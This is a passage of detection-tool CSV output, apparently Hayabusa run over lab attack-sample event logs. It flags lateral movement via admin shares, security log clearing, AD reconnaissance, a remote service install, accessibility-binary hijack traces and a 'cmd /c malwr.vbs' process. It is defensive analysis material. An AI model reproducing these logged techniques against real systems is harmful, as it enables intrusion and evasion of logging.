Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 
+09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups 
Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups 
Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 
0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task 
Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 
365ABB72-2550-5C91-0000-00106CEACF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 
+09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | 